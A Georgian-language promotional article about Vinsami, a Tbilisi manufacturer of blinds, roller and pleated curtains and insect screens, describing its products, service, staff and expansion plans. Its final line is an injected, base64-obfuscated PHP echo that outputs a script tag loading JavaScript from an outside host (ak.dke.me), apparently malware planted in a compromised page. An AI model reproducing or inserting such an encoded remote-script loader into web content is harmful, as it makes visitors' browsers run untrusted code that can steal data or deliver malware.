gorgia
jaluzi

ფარდა-ჟალუზების გალერეა ვინსამი 2019 წლიდან ფუნქციონირებს და დღეს უკვე ერთ-ერთ წამყვან ადგილს იკავებს ჟალუზების ადგილობრივ ბაზარზე. კომპანია გამოირჩევა მრავალფეროვანი პროდუქციის წარმოებით, მომხმარებელზე მორგებული მომსახურებითა და ეკოლოგიურად სუფთა, სერტიფიცირებული მასალების გამოყენებით. 

როგორც საინფორმაციო სააგენტო "ბიზნესთაიმს" კომპანიაში განუცხადეს, „ვინსამი“ მომხმარებელს სთავაზობს იდეალურ ბალანსს ფასსა და ხარისხს შორის - თანამედროვე დიზაინი, პრაქტიკულობა და ხელმისაწვდომობა ყველა ტიპის სივრცისთვის.WhatsApp Image 2025 05 29 at 15.49.23 6a73d41f

კომპანიაში ამ დროისთვის 15 ადამიანია დასაქმებული. გამოცდილი პროფესიონალებისგან შემდგარი გუნდი ყოველდღიურად ზრუნავს იმაზე, რომ მომხმარებელმა მიიღოს პრაქტიკული, ესთეტიკური და მაღალი ხარისხის მომსახურება ნებისმიერი ტიპის ინტერიერისთვის.

მრავალფეროვანი პროდუქცია - არჩევანი ყველა გემოვნებისთვის

„ვინსამი“-ს საწარმოო ხაზზე მზადდება:

  • პლისე ჟალუზები
  • ფარდა როლეტები
  • ზებრა როლეტები
  • რომაული ფარდები
  • ვერტიკალური და ჰორიზონტალური ჟალუზები
  • მწერებისგან დამცავი გოფრირებული ბადეები სლაიდური სისტემით

 

ამ პროდუქტებს აქტიურად იყენებენ როგორც საცხოვრებელ სივრცეებში, ისე მასშტაბურ ობიექტებზე - ბაღებში, სკოლებში, კლინიკებსა და სახელმწიფო დაწესებულებებში.

WhatsApp Image 2025 05 29 at 15.49.23 3337326a

ხარისხი - ნდობის გარანტი

კომპანიაში ხაზგასმით აღნიშნავენ, რომ კომპანია მხოლოდ სერტიფიცირებულ და გამძლე მასალას იყენებს. აქცენტი კეთდება ეკოლოგიურობაზე და გამოყენებული ნედლეული სრულად შეესაბამება თანამედროვე სტანდარტებს.

ჩვენი ჟალუზები მზადდება სრულად საქართველოში, რაც გვაძლევს საშუალებას, მომხმარებელს მივაწოდოთ ხარისხიანი და დროული პროდუქტი,“ - განმარტავენ კომპნიანიაში.

მათივე განმარტებით, დამკვეთთან შეთანხმება მარტივი პროცესია, თუმცა სრულყოფილი მომსახურების გარანტიით. მომხმარებელთან ურთიერთობა იწყება კონსულტაციით - კომპანიის წარმომადგენლები ადგილზე მიდიან, აფასებენ სივრცეს, ურჩევენ საუკეთესო ვარიანტს, არჩევენ ფერსა და ფაქტურას. შეკვეთის დამზადებისა და ადგილზე მიწოდების პროცესი კი სულ რამდენიმე დღეს მოიცავს. სწორედ ასეთი მომსახურება გახდა მზარდი ნდობის საწინდარი, რამაც განაპირობა ბოლო წლების განმავლობაში მოთხოვნის მნიშვნელოვანი მატება. მომხმარებელი ირჩევს ადგილობრივ ხარისხსა და სწრაფ მომსახურებას - რაც „ვინსამი“- ს მუდმივად მზარდ პოპულარობას განაპირობებს.

WhatsApp Image 2025 05 29 at 15.50.33 9796f88f

სიახლეები და სამომავლო გეგმები

როგორც კომპანიაში განაცხადეს, ამ ეტაპზე „ვინსამი“ არ აწარმოებს ჭკვიან (smart) ჟალუზებს, თუმცა ახლო მომავალში, 2025 წლის განმავლობაში, იგეგმება როგორც ჭკვიანი ჟალუზების, ისე ღია აივნებისთვის განკუთვნილი ზიპ-ჟალუზების წარმოების დაწყება. 

მისამართი: კახეთის გზატკეცილი 65, თბილისი
ტელეფონი: 555 95 75 50

187
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");